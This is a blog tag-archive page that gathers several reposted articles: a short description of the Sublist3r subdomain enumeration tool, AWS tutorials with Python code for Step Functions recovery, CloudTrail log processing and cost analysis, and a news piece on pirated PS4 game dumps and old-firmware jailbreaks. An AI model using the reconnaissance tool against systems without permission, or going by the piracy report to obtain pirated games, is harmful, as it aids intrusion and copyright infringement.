Tag Archives: dumps

Sublist3r – Fast Python Subdomain Enumeration Tool

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/sublist3r-fast-python-subdomain-enumeration-tool/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

Sublist3r – Fast Python Subdomain Enumeration Tool

Sublist3r is a Python-based tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting.

It also integrates with subbrute for subdomain brute-forcing with word lists.

Features of Sublist3r Subdomain Enumeration Tool

It enumerates subdomains using many search engines such as:

  • Google
  • Yahoo
  • Bing
  • Baidu
  • Ask

The tool also enumerates subdomains using:

  • Netcraft
  • Virustotal
  • ThreatCrowd
  • DNSdumpster
  • ReverseDNS

Requirements of Sublist3r Subdomain Search

It currently supports Python 2 and Python 3.

Read the rest of Sublist3r – Fast Python Subdomain Enumeration Tool now! Only available at Darknet.

Resume AWS Step Functions from Any State

Post Syndicated from Andy Katz original https://aws.amazon.com/blogs/compute/resume-aws-step-functions-from-any-state/


Yash Pant, Solutions Architect, AWS


Aaron Friedman, Partner Solutions Architect, AWS

When we discuss how to build applications with customers, we often align to the Well Architected Framework pillars of security, reliability, performance efficiency, cost optimization, and operational excellence. Designing for failure is an essential component to developing well architected applications that are resilient to spurious errors that may occur.

There are many ways you can use AWS services to achieve high availability and resiliency of your applications. For example, you can couple Elastic Load Balancing with Auto Scaling and Amazon EC2 instances to build highly available applications. Or use Amazon API Gateway and AWS Lambda to rapidly scale out a microservices-based architecture. Many AWS services have built in solutions to help with the appropriate error handling, such as Dead Letter Queues (DLQ) for Amazon SQS or retries in AWS Batch.

AWS Step Functions is an AWS service that makes it easy for you to coordinate the components of distributed applications and microservices. Step Functions allows you to easily design for failure, by incorporating features such as error retries and custom error handling from AWS Lambda exceptions. These features allow you to programmatically handle many common error modes and build robust, reliable applications.

In some rare cases, however, your application may fail in an unexpected manner. In these situations, you might not want to duplicate in a repeat execution those portions of your state machine that have already run. This is especially true when orchestrating long-running jobs or executing a complex state machine as part of a microservice. Here, you need to know the last successful state in your state machine from which to resume, so that you don’t duplicate previous work. In this post, we present a solution to enable you to resume from any given state in your state machine in the case of an unexpected failure.

Resuming from a given state

To resume a failed state machine execution from the state at which it failed, you first run a script that dynamically creates a new state machine. When the new state machine is executed, it resumes the failed execution from the point of failure. The script contains the following two primary steps:

  1. Parse the execution history of the failed execution to find the name of the state at which it failed, as well as the JSON input to that state.
  2. Create a new state machine, which adds an additional state to failed state machine, called "GoToState". "GoToState" is a choice state at the beginning of the state machine that branches execution directly to the failed state, allowing you to skip states that had succeeded in the previous execution.

The full script along with a CloudFormation template that creates a demo of this is available in the aws-sfn-resume-from-any-state GitHub repo.

Diving into the script

In this section, we walk you through the script and highlight the core components of its functionality. The script contains a main function, which adds a command line parameter for the failedExecutionArn so that you can easily call the script from the command line:

python gotostate.py --failedExecutionArn '<Failed_Execution_Arn>'

Identifying the failed state in your execution

First, the script extracts the name of the failed state along with the input to that state. It does so by using the failed state machine execution history, which is identified by the Amazon Resource Name (ARN) of the execution. The failed state is marked in the execution history, along with the input to that state (which is also the output of the preceding successful state). The script is able to parse these values from the log.

The script loops through the execution history of the failed state machine, and traces it backwards until it finds the failed state. If the state machine failed in a parallel state, then it must restart from the beginning of the parallel state. The script is able to capture the name of the parallel state that failed, rather than any substate within the parallel state that may have caused the failure. The following code is the Python function that does this.


def parseFailureHistory(failedExecutionArn):

    '''
    Parses the execution history of a failed state machine to get the name of failed state and the input to the failed state:
    Input failedExecutionArn = A string containing the execution ARN of a failed state machine y
    Output = A list with two elements: [name of failed state, input to failed state]
    '''
    failedAtParallelState = False
    try:
        #Get the execution history
        response = client.get\_execution\_history(
            executionArn=failedExecutionArn,
            reverseOrder=True
        )
        failedEvents = response['events']
    except Exception as ex:
        raise ex
    #Confirm that the execution actually failed, raise exception if it didn't fail.
    try:
        failedEvents[0]['executionFailedEventDetails']
    except:
        raise('Execution did not fail')
        
    '''
    If you have a 'States.Runtime' error (for example, if a task state in your state machine attempts to execute a Lambda function in a different region than the state machine), get the ID of the failed state, and use it to determine the failed state name and input.
    '''
    
    if failedEvents[0]['executionFailedEventDetails']['error'] == 'States.Runtime':
        failedId = int(filter(str.isdigit, str(failedEvents[0]['executionFailedEventDetails']['cause'].split()[13])))
        failedState = failedEvents[-1 \* failedId]['stateEnteredEventDetails']['name']
        failedInput = failedEvents[-1 \* failedId]['stateEnteredEventDetails']['input']
        return (failedState, failedInput)
        
    '''
    You need to loop through the execution history, tracing back the executed steps.
    The first state you encounter is the failed state. If you failed on a parallel state, you need the name of the parallel state rather than the name of a state within a parallel state that it failed on. This is because you can only attach goToState to the parallel state, but not a substate within the parallel state.
    This loop starts with the ID of the latest event and uses the previous event IDs to trace back the execution to the beginning (id 0). However, it returns as soon it finds the name of the failed state.
    '''

    currentEventId = failedEvents[0]['id']
    while currentEventId != 0:
        #multiply event ID by -1 for indexing because you're looking at the reversed history
        currentEvent = failedEvents[-1 \* currentEventId]
        
        '''
        You can determine if the failed state was a parallel state because it and an event with 'type'='ParallelStateFailed' appears in the execution history before the name of the failed state
        '''

        if currentEvent['type'] == 'ParallelStateFailed':
            failedAtParallelState = True

        '''
        If the failed state is not a parallel state, then the name of failed state to return is the name of the state in the first 'TaskStateEntered' event type you run into when tracing back the execution history
        '''

        if currentEvent['type'] == 'TaskStateEntered' and failedAtParallelState == False:
            failedState = currentEvent['stateEnteredEventDetails']['name']
            failedInput = currentEvent['stateEnteredEventDetails']['input']
            return (failedState, failedInput)

        '''
        If the failed state was a parallel state, then you need to trace execution back to the first event with 'type'='ParallelStateEntered', and return the name of the state
        '''

        if currentEvent['type'] == 'ParallelStateEntered' and failedAtParallelState:
            failedState = failedState = currentEvent['stateEnteredEventDetails']['name']
            failedInput = currentEvent['stateEnteredEventDetails']['input']
            return (failedState, failedInput)
        #Update the ID for the next execution of the loop
        currentEventId = currentEvent['previousEventId']
        

Create the new state machine

The script uses the name of the failed state to create the new state machine, with "GoToState" branching execution directly to the failed state.

To do this, the script requires the Amazon States Language (ASL) definition of the failed state machine. It modifies the definition to append "GoToState", and create a new state machine from it.

The script gets the ARN of the failed state machine from the execution ARN of the failed state machine. This ARN allows it to get the ASL definition of the failed state machine by calling the DesribeStateMachine API action. It creates a new state machine with "GoToState".

When the script creates the new state machine, it also adds an additional input variable called "resuming". When you execute this new state machine, you specify this resuming variable as true in the input JSON. This tells "GoToState" to branch execution to the state that had previously failed. Here’s the function that does this:

def attachGoToState(failedStateName, stateMachineArn):

    '''
    Given a state machine ARN and the name of a state in that state machine, create a new state machine that starts at a new choice state called 'GoToState'. "GoToState" branches to the named state, and sends the input of the state machine to that state, when a variable called "resuming" is set to True.
    Input failedStateName = A string with the name of the failed state
          stateMachineArn = A string with the ARN of the state machine
    Output response from the create_state_machine call, which is the API call that creates a new state machine
    '''

    try:
        response = client.describe\_state\_machine(
            stateMachineArn=stateMachineArn
        )
    except:
        raise('Could not get ASL definition of state machine')
    roleArn = response['roleArn']
    stateMachine = json.loads(response['definition'])
    #Create a name for the new state machine
    newName = response['name'] + '-with-GoToState'
    #Get the StartAt state for the original state machine, because you point the 'GoToState' to this state
    originalStartAt = stateMachine['StartAt']

    '''
    Create the GoToState with the variable $.resuming.
    If new state machine is executed with $.resuming = True, then the state machine skips to the failed state.
    Otherwise, it executes the state machine from the original start state.
    '''

    goToState = {'Type':'Choice', 'Choices':[{'Variable':'$.resuming', 'BooleanEquals':False, 'Next':originalStartAt}], 'Default':failedStateName}
    #Add GoToState to the set of states in the new state machine
    stateMachine['States']['GoToState'] = goToState
    #Add StartAt
    stateMachine['StartAt'] = 'GoToState'
    #Create new state machine
    try:
        response = client.create_state_machine(
            name=newName,
            definition=json.dumps(stateMachine),
            roleArn=roleArn
        )
    except:
        raise('Failed to create new state machine with GoToState')
    return response

Testing the script

Now that you understand how the script works, you can test it out.

The following screenshot shows an example state machine that has failed, called "TestMachine". This state machine successfully completed "FirstState" and "ChoiceState", but when it branched to "FirstMatchState", it failed.

Use the script to create a new state machine that allows you to rerun this state machine, but skip the "FirstState" and the "ChoiceState" steps that already succeeded. You can do this by calling the script as follows:

python gotostate.py --failedExecutionArn 'arn:aws:states:us-west-2:<AWS_ACCOUNT_ID>:execution:TestMachine-with-GoToState:b2578403-f41d-a2c7-e70c-7500045288595

This creates a new state machine called "TestMachine-with-GoToState", and returns its ARN, along with the input that had been sent to "FirstMatchState". You can then inspect the input to determine what caused the error. In this case, you notice that the input to "FirstMachState" was the following:

{
"foo": 1,
"Message": true
}

However, this state machine expects the "Message" field of the JSON to be a string rather than a Boolean. Execute the new "TestMachine-with-GoToState" state machine, change the input to be a string, and add the "resuming" variable that "GoToState" requires:

{
"foo": 1,
"Message": "Hello!",
"resuming":true
}

When you execute the new state machine, it skips "FirstState" and "ChoiceState", and goes directly to "FirstMatchState", which was the state that failed:

Look at what happens when you have a state machine with multiple parallel steps. This example is included in the GitHub repository associated with this post. The repo contains a CloudFormation template that sets up this state machine and provides instructions to replicate this solution.

The following state machine, "ParallelStateMachine", takes an input through two subsequent parallel states before doing some final processing and exiting, along with the JSON with the ASL definition of the state machine.

{
  "Comment": "An example of the Amazon States Language using a parallel state to execute two branches at the same time.",
  "StartAt": "Parallel",
  "States": {
    "Parallel": {
      "Type": "Parallel",
      "ResultPath":"$.output",
      "Next": "Parallel 2",
      "Branches": [
        {
          "StartAt": "Parallel Step 1, Process 1",
          "States": {
            "Parallel Step 1, Process 1": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
              "End": true
            }
          }
        },
        {
          "StartAt": "Parallel Step 1, Process 2",
          "States": {
            "Parallel Step 1, Process 2": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
              "End": true
            }
          }
        }
      ]
    },
    "Parallel 2": {
      "Type": "Parallel",
      "Next": "Final Processing",
      "Branches": [
        {
          "StartAt": "Parallel Step 2, Process 1",
          "States": {
            "Parallel Step 2, Process 1": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXXX:function:LambdaB",
              "End": true
            }
          }
        },
        {
          "StartAt": "Parallel Step 2, Process 2",
          "States": {
            "Parallel Step 2, Process 2": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
              "End": true
            }
          }
        }
      ]
    },
    "Final Processing": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC",
      "End": true
    }
  }
}

First, use an input that initially fails:

{
  "Message": "Hello!"
}

This fails because the state machine expects you to have a variable in the input JSON called "foo" in the second parallel state to run "Parallel Step 2, Process 1" and "Parallel Step 2, Process 2". Instead, the original input gets processed by the first parallel state and produces the following output to pass to the second parallel state:

{
"output": [
    {
      "Message": "Hello!"
    },
    {
      "Message": "Hello!"
    }
  ],
}

Run the script on the failed state machine to create a new state machine that allows it to resume directly at the second parallel state instead of having to redo the first parallel state. This creates a new state machine called "ParallelStateMachine-with-GoToState". The following JSON was created by the script to define the new state machine in ASL. It contains the "GoToState" value that was attached by the script.

{
   "Comment":"An example of the Amazon States Language using a parallel state to execute two branches at the same time.",
   "States":{
      "Final Processing":{
         "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC",
         "End":true,
         "Type":"Task"
      },
      "GoToState":{
         "Default":"Parallel 2",
         "Type":"Choice",
         "Choices":[
            {
               "Variable":"$.resuming",
               "BooleanEquals":false,
               "Next":"Parallel"
            }
         ]
      },
      "Parallel":{
         "Branches":[
            {
               "States":{
                  "Parallel Step 1, Process 1":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 1, Process 1"
            },
            {
               "States":{
                  "Parallel Step 1, Process 2":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:LambdaA",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 1, Process 2"
            }
         ],
         "ResultPath":"$.output",
         "Type":"Parallel",
         "Next":"Parallel 2"
      },
      "Parallel 2":{
         "Branches":[
            {
               "States":{
                  "Parallel Step 2, Process 1":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 2, Process 1"
            },
            {
               "States":{
                  "Parallel Step 2, Process 2":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 2, Process 2"
            }
         ],
         "Type":"Parallel",
         "Next":"Final Processing"
      }
   },
   "StartAt":"GoToState"
}

You can then execute this state machine with the correct input by adding the "foo" and "resuming" variables:

{
  "foo": 1,
  "output": [
    {
      "Message": "Hello!"
    },
    {
      "Message": "Hello!"
    }
  ],
  "resuming": true
}

This yields the following result. Notice that this time, the state machine executed successfully to completion, and skipped the steps that had previously failed.


Conclusion

When you’re building out complex workflows, it’s important to be prepared for failure. You can do this by taking advantage of features such as automatic error retries in Step Functions and custom error handling of Lambda exceptions.

Nevertheless, state machines still have the possibility of failing. With the methodology and script presented in this post, you can resume a failed state machine from its point of failure. This allows you to skip the execution of steps in the workflow that had already succeeded, and recover the process from the point of failure.

To see more examples, please visit the Step Functions Getting Started page.

If you have questions or suggestions, please comment below.

Visualize AWS Cloudtrail Logs using AWS Glue and Amazon Quicksight

Post Syndicated from Luis Caro Perez original https://aws.amazon.com/blogs/big-data/streamline-aws-cloudtrail-log-visualization-using-aws-glue-and-amazon-quicksight/

Being able to easily visualize AWS CloudTrail logs gives you a better understanding of how your AWS infrastructure is being used. It can also help you audit and review AWS API calls and detect security anomalies inside your AWS account. To do this, you must be able to perform analytics based on your CloudTrail logs.

In this post, I walk through using AWS Glue and AWS Lambda to convert AWS CloudTrail logs from JSON to a query-optimized format dataset in Amazon S3. I then use Amazon Athena and Amazon QuickSight to query and visualize the data.

Solution overview

To process CloudTrail logs, you must implement the following architecture:

CloudTrail delivers log files in an Amazon S3 bucket folder. To correctly crawl these logs, you modify the file contents and folder structure using an Amazon S3-triggered Lambda function that stores the transformed files in an S3 bucket single folder. When the files are in a single folder, AWS Glue scans the data, converts it into Apache Parquet format, and catalogs it to allow for querying and visualization using Amazon Athena and Amazon QuickSight.

Walkthrough

Let’s look at the steps that are required to build the solution.

Set up CloudTrail logs

First, you need to set up a trail that delivers log files to an S3 bucket. To create a trail in CloudTrail, follow the instructions in Creating a Trail.

When you finish, the trail settings page should look like the following screenshot:

In this example, I set up log files to be delivered to the cloudtraillfcaro bucket.

Consolidate CloudTrail reports into a single folder using Lambda

AWS CloudTrail delivers log files using the following folder structure inside the configured Amazon S3 bucket:

AWSLogs/ACCOUNTID/CloudTrail/REGION/YEAR/MONTH/HOUR/filename.json.gz

Additionally, log files have the following structure:

{
    "Records": [{
        "eventVersion": "1.01",
        "userIdentity": {
            "type": "IAMUser",
            "principalId": "AIDAJDPLRKLG7UEXAMPLE",
            "arn": "arn:aws:iam::123456789012:user/Alice",
            "accountId": "123456789012",
            "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
            "userName": "Alice",
            "sessionContext": {
                "attributes": {
                    "mfaAuthenticated": "false",
                    "creationDate": "2014-03-18T14:29:23Z"
                }
            }
        },
        "eventTime": "2014-03-18T14:30:07Z",
        "eventSource": "cloudtrail.amazonaws.com",
        "eventName": "StartLogging",
        "awsRegion": "us-west-2",
        "sourceIPAddress": "72.21.198.64",
        "userAgent": "signin.amazonaws.com",
        "requestParameters": {
            "name": "Default"
        },
        "responseElements": null,
        "requestID": "cdc73f9d-aea9-11e3-9d5a-835b769c0d9c",
        "eventID": "3074414d-c626-42aa-984b-68ff152d6ab7"
    },
    ... additional entries ...
    ]

If AWS Glue crawlers are used to catalog these files as they are written, the following obstacles arise:

  1. AWS Glue identifies different tables per different folders because they don’t follow a traditional partition format.
  2. Based on the structure of the file content, AWS Glue identifies the tables as having a single column of type array.
  3. CloudTrail logs have JSON attributes that use uppercase letters. According to the Best Practices When Using Athena with AWS Glue, it is recommended that you convert these to lowercase.

To have AWS Glue catalog all log files in a single table with all the columns describing each event, implement the following Lambda function:

from __future__ import print_function
import json
import urllib
import boto3
import gzip

s3 = boto3.resource('s3')
client = boto3.client('s3')

def convertColumntoLowwerCaps(obj):
    for key in obj.keys():
        new_key = key.lower()
        if new_key != key:
            obj[new_key] = obj[key]
            del obj[key]
    return obj


def lambda_handler(event, context):

    bucket = event['Records'][0]['s3']['bucket']['name']
    key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key'].encode('utf8'))
    print(bucket)
    print(key)
    try:
        newKey = 'flatfiles/' + key.replace("/", "")
        client.download_file(bucket, key, '/tmp/file.json.gz')
        with gzip.open('/tmp/out.json.gz', 'w') as output, gzip.open('/tmp/file.json.gz', 'rb') as file:
            i = 0
            for line in file: 
                for record in json.loads(line,object_hook=convertColumntoLowwerCaps)['records']:
            		if i != 0:
            		    output.write("\n")
            		output.write(json.dumps(record))
            		i += 1
        client.upload_file('/tmp/out.json.gz', bucket,newKey)
        return "success"
    except Exception as e:
        print(e)
        print('Error processing object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))
        raise e

The function goes over each element of the records array, changes uppercase letters to lowercase in column names, and inserts each element of the array as a single line of a new file. The new file is saved inside a flatfiles folder created by the function without any subfolders in the S3 bucket.

The function should have a role containing a policy with at least the following permissions:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "s3:*"
            ],
            "Resource": [
                "arn:aws:s3:::cloudtraillfcaro/*",
                "arn:aws:s3:::cloudtraillfcaro"
            ],
            "Effect": "Allow"
        }
    ]
}

In this example, CloudTrail delivers logs to the cloudtraillfcaro bucket. Make sure that you replace this name with your bucket name in the policy. For more information about how to work with inline policies, see Working with Inline Policies.

After the Lambda function is created, you can set up the following trigger using the Triggers tab on the AWS Lambda console.

Choose Add trigger, and choose S3 as a source of the trigger.

After choosing the source, configure the following settings:

In the trigger, any file that is written to the path for the log files—which in this case is AWSLogs/119582755581/CloudTrail/—is processed. Make sure that the Enable trigger check box is selected and that the bucket and prefix parameters match your use case.

After you set up the function and receive log files, the bucket (in this case cloudtraillfcaro) should contain the processed files inside the flatfiles folder.

Catalog source data

Once the files are processed by the Lambda function, set up a crawler named cloudtrail to catalog them.

The crawler must point to the flatfiles folder.

All the crawlers and AWS Glue jobs created for this solution must have a role with the AWSGlueServiceRole managed policy and an inline policy with permissions to modify the S3 buckets used on the Lambda function. For more information, see Working with Managed Policies.

The role should look like the following:

In this example, the inline policy named s3perms contains the permissions to modify the S3 buckets.

After you choose the role, you can schedule the crawler to run on demand.

A new database is created, and the crawler is set to use it. In this case, the cloudtrail database is used for all the tables.

After the crawler runs, a single table should be created in the catalog with the following structure:

The table should contain the following columns:

Create and run the AWS Glue job

To convert all the CloudTrail logs to a columnar store in Parquet, set up an AWS Glue job by following these steps.

Upload the following script into a bucket in Amazon S3:

import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
import boto3
import time

## @params: [JOB_NAME]
args = getResolvedOptions(sys.argv, ['JOB_NAME'])

sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)

datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "cloudtrail", table_name = "flatfiles", transformation_ctx = "datasource0")
resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "make_struct", transformation_ctx = "resolvechoice1")
relationalized1 = resolvechoice1.relationalize("trail", args["TempDir"]).select("trail")
datasink = glueContext.write_dynamic_frame.from_options(frame = relationalized1, connection_type = "s3", connection_options = {"path": "s3://cloudtraillfcaro/parquettrails"}, format = "parquet", transformation_ctx = "datasink4")
job.commit()

In the example, you load the script as a file named cloudtrailtoparquet.py. Make sure that you modify the script and update the “{"path": "s3://cloudtraillfcaro/parquettrails"}” with the destination in which you want to store your results.

After uploading the script, add a new AWS Glue job. Choose a name and role for the job, and choose the option of running the job from An existing script that you provide.

To avoid processing the same data twice, enable the Job bookmark setting in the Advanced properties section of the job properties.

Choose Next twice, and then choose Finish.

If logs are already in the flatfiles folder, you can run the job on demand to generate the first set of results.

Once the job starts running, wait for it to complete.

When the job is finished, its Run status should be Succeeded. After that, you can verify that the Parquet files are written to the Amazon S3 location.

Catalog results

To be able to process results from Athena, you can use an AWS Glue crawler to catalog the results of the AWS Glue job.

In this example, the crawler is set to use the same database as the source named cloudtrail.

You can run the crawler using the console. When the crawler finishes running and has processed the Parquet results, a new table should be created in the AWS Glue Data Catalog. In this example, it’s named parquettrails.

The table should have the classification set to parquet.

It should have the same columns as the flatfiles table, with the exception of the struct type columns, which should be relationalized into several columns:

In this example, notice how the requestparameters column, which was a struct in the original table (flatfiles), was transformed to several columns—one for each key value inside it. This is done using a transformation native to AWS Glue called relationalize.

Query results with Athena

After crawling the results, you can query them using Athena. For example, to query what events took place in the time frame between 2017-10-23t12:00:00 and 2017-10-23t13:00, use the following select statement:

select *
from cloudtrail.parquettrails
where eventtime > '2017-10-23T12:00:00Z' AND eventtime < '2017-10-23T13:00:00Z'
order by eventtime asc;

Be sure to replace cloudtrail.parquettrails with the names of your database and table that references the Parquet results. Replace the datetimes with an hour when your account had activity and was processed by the AWS Glue job.

Visualize results using Amazon QuickSight

Once you can query the data using Athena, you can visualize it using Amazon QuickSight. Before connecting Amazon QuickSight to Athena, be sure to grant QuickSight access to Athena and the associated S3 buckets in your account. For more information, see Managing Amazon QuickSight Permissions to AWS Resources. You can then create a new data set in Amazon QuickSight based on the Athena table that you created.

After setting up permissions, you can create a new analysis in Amazon QuickSight by choosing New analysis.

Then add a new data set.

Choose Athena as the source.

Give the data source a name (in this case, I named it cloudtrail).

Choose the name of the database and the table referencing the Parquet results.

Then choose Visualize.

After that, you should see the following screen:

Now you can create some visualizations. First, search for the sourceipaddress column, and drag it to the AutoGraph section.

You can see a list of the IP addresses that you have used to interact with AWS. To review whether these IP addresses have been used from IAM users, internal AWS services, or roles, use the type value that is inside the useridentity field of the original log files. Thanks to the relationalize transformation, this value is available as the useridentity.type column. After the column is added into the Group/Color box, the visualization should look like the following:

You can now see and distinguish the most used IPs and whether they are used from roles, AWS services, or IAM users.

After following all these steps, you can use Amazon QuickSight to add different columns from CloudTrail and perform different types of visualizations. You can build operational dashboards that continuously monitor AWS infrastructure usage and access. You can share those dashboards with others in your organization who might need to see this data.

Summary

In this post, you saw how you can use a simple Lambda function and an AWS Glue script to convert text files into Parquet to improve Athena query performance and data compression. The post also demonstrated how to use AWS Lambda to preprocess files in Amazon S3 and transform them into a format that is recognizable by AWS Glue crawlers.

This example, used AWS CloudTrail logs, but you can apply the proposed solution to any set of files that after preprocessing, can be cataloged by AWS Glue.


Additional Reading

Learn how to Harmonize, Query, and Visualize Data from Various Providers using AWS Glue, Amazon Athena, and Amazon QuickSight.


About the Authors

Luis Caro is a Big Data Consultant for AWS Professional Services. He works with our customers to provide guidance and technical assistance on big data projects, helping them improving the value of their solutions when using AWS.

 

 

 

PS4 Piracy Now Exists – If Gamers Want to Jump Through Hoops

Post Syndicated from Andy original https://torrentfreak.com/ps4-piracy-now-exists-if-gamers-want-to-jump-through-hoops-170930/

During the reign of the first few generations of consoles, gamers became accustomed to their machines being compromised by hacking groups and enthusiasts, to enable the execution of third-party software.

Often carried out under the banner of running “homebrew” code, so-called jailbroken consoles also brought with them the prospect of running pirate copies of officially produced games. Once the floodgates were opened, not much could hold things back.

With the advent of mass online gaming, however, things became more complex. Regular firmware updates mean that security holes could be fixed remotely whenever a user went online, rendering the jailbreaking process a cat-and-mouse game with continually moving targets.

This, coupled with massively improved overall security, has meant that the current generation of consoles has remained largely piracy free, at least on a do-it-at-home basis. Now, however, that position is set to change after the first decrypted PS4 game dumps began to hit the web this week.

Thanks to release group KOTF (Knights of the Fallen), Grand Theft Auto V, Far Cry 4, and Assassins Creed IV are all available for download from the usual places. As expected they are pretty meaty downloads, with GTAV weighing in via 90 x 500MB files, Far Cry4 via 54 of the same size, and ACIV sporting 84 x 250MB.

Partial NFO file for PS4 GTA V

While undoubtedly large, it’s not the filesize that will prove most prohibitive when it comes to getting these beasts to run on a PlayStation 4. Indeed, a potential pirate will need to jump through a number of hoops to enjoy any of these titles or others that may appear in the near future.

KOTF explains as much in the NFO (information) files it includes with its releases. The list of requirements is long.

First up, a gamer needs to possess a PS4 with an extremely old firmware version – v1.76 – which was released way back in August 2014. The fact this firmware is required doesn’t come as a surprise since it was successfully jailbroken back in December 2015.

The age of the firmware raises several issues, not least where people can obtain a PS4 that’s so old it still has this firmware intact. Also, newer games require later firmware, so most games released during the past two to three years won’t be compatible with v1.76. That limits the pool of games considerably.

Finally, forget going online with such an old software version. Sony will be all over it like a cheap suit, plotting to do something unpleasant to that cheeky antique code, given half a chance. And, for anyone wondering, downgrading a higher firmware version to v1.76 isn’t possible – yet.

But for gamers who want a little bit of recent PS4 nostalgia on the cheap, ‘all’ they have to do is gather the necessary tools together and follow the instructions below.

Easy – when you know how

While this is a landmark moment for PS4 piracy (which to date has mainly centered around much hocus pocus), the limitations listed above mean that it isn’t going to hit the mainstream just yet.

That being said, all things are possible when given the right people, determination, and enough time. Whether that will be anytime soon is anyone’s guess but there are rumors that firmware v4.55 has already been exploited, so you never know.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Analyzing AWS Cost and Usage Reports with Looker and Amazon Athena

Post Syndicated from Dillon Morrison original https://aws.amazon.com/blogs/big-data/analyzing-aws-cost-and-usage-reports-with-looker-and-amazon-athena/

This is a guest post by Dillon Morrison at Looker. Looker is, in their own words, “a new kind of analytics platform–letting everyone in your business make better decisions by getting reliable answers from a tool they can use.” 

As the breadth of AWS products and services continues to grow, customers are able to more easily move their technology stack and core infrastructure to AWS. One of the attractive benefits of AWS is the cost savings. Rather than paying upfront capital expenses for large on-premises systems, customers can instead pay variables expenses for on-demand services. To further reduce expenses AWS users can reserve resources for specific periods of time, and automatically scale resources as needed.

The AWS Cost Explorer is great for aggregated reporting. However, conducting analysis on the raw data using the flexibility and power of SQL allows for much richer detail and insight, and can be the better choice for the long term. Thankfully, with the introduction of Amazon Athena, monitoring and managing these costs is now easier than ever.

In the post, I walk through setting up the data pipeline for cost and usage reports, Amazon S3, and Athena, and discuss some of the most common levers for cost savings. I surface tables through Looker, which comes with a host of pre-built data models and dashboards to make analysis of your cost and usage data simple and intuitive.

Analysis with Athena

With Athena, there’s no need to create hundreds of Excel reports, move data around, or deploy clusters to house and process data. Athena uses Apache Hive’s DDL to create tables, and the Presto querying engine to process queries. Analysis can be performed directly on raw data in S3. Conveniently, AWS exports raw cost and usage data directly into a user-specified S3 bucket, making it simple to start querying with Athena quickly. This makes continuous monitoring of costs virtually seamless, since there is no infrastructure to manage. Instead, users can leverage the power of the Athena SQL engine to easily perform ad-hoc analysis and data discovery without needing to set up a data warehouse.

After the data pipeline is established, cost and usage data (the recommended billing data, per AWS documentation) provides a plethora of comprehensive information around usage of AWS services and the associated costs. Whether you need the report segmented by product type, user identity, or region, this report can be cut-and-sliced any number of ways to properly allocate costs for any of your business needs. You can then drill into any specific line item to see even further detail, such as the selected operating system, tenancy, purchase option (on-demand, spot, or reserved), and so on.

Walkthrough

By default, the Cost and Usage report exports CSV files, which you can compress using gzip (recommended for performance). There are some additional configuration options for tuning performance further, which are discussed below.

Prerequisites

If you want to follow along, you need the following resources:

Enable the cost and usage reports

First, enable the Cost and Usage report. For Time unit, select Hourly. For Include, select Resource IDs. All options are prompted in the report-creation window.

The Cost and Usage report dumps CSV files into the specified S3 bucket. Please note that it can take up to 24 hours for the first file to be delivered after enabling the report.

Configure the S3 bucket and files for Athena querying

In addition to the CSV file, AWS also creates a JSON manifest file for each cost and usage report. Athena requires that all of the files in the S3 bucket are in the same format, so we need to get rid of all these manifest files. If you’re looking to get started with Athena quickly, you can simply go into your S3 bucket and delete the manifest file manually, skip the automation described below, and move on to the next section.

To automate the process of removing the manifest file each time a new report is dumped into S3, which I recommend as you scale, there are a few additional steps. The folks at Concurrency labs wrote a great overview and set of scripts for this, which you can find in their GitHub repo.

These scripts take the data from an input bucket, remove anything unnecessary, and dump it into a new output bucket. We can utilize AWS Lambda to trigger this process whenever new data is dropped into S3, or on a nightly basis, or whatever makes most sense for your use-case, depending on how often you’re querying the data. Please note that enabling the “hourly” report means that data is reported at the hour-level of granularity, not that a new file is generated every hour.

Following these scripts, you’ll notice that we’re adding a date partition field, which isn’t necessary but improves query performance. In addition, converting data from CSV to a columnar format like ORC or Parquet also improves performance. We can automate this process using Lambda whenever new data is dropped in our S3 bucket. Amazon Web Services discusses columnar conversion at length, and provides walkthrough examples, in their documentation.

As a long-term solution, best practice is to use compression, partitioning, and conversion. However, for purposes of this walkthrough, we’re not going to worry about them so we can get up-and-running quicker.

Set up the Athena query engine

In your AWS console, navigate to the Athena service, and click “Get Started”. Follow the tutorial and set up a new database (we’ve called ours “AWS Optimizer” in this example). Don’t worry about configuring your initial table, per the tutorial instructions. We’ll be creating a new table for cost and usage analysis. Once you walked through the tutorial steps, you’ll be able to access the Athena interface, and can begin running Hive DDL statements to create new tables.

